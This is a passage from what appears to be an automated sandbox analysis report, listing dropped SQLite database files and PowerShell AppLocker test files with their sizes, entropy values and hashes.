                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UakpZIpQ7A

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UjYSsacRkc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ukz0wVMxpE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UpJpxdgUk4

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\UraSRzYPy3

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Us3P7WH1Hx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ut1YlPvwsa

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\VFqP1C0V8Z

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\VagBD6YJ9W

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Wo5DdIBlKA

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\XIhFIosn1w

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\XlvFxONiFQ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\XuO4Mtbha9

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Xzcqpwz8tj

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\YUQDYnN5qk

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\YpdsrPVdC9

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ZEFGBqOW5L

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ZqKQ2F4I1i

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oy3ids5.frt.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2pfbnqvw.4qz.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rzzkryj.10l.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bmkqbsfb.fqc.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpdogcmt.1hc.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
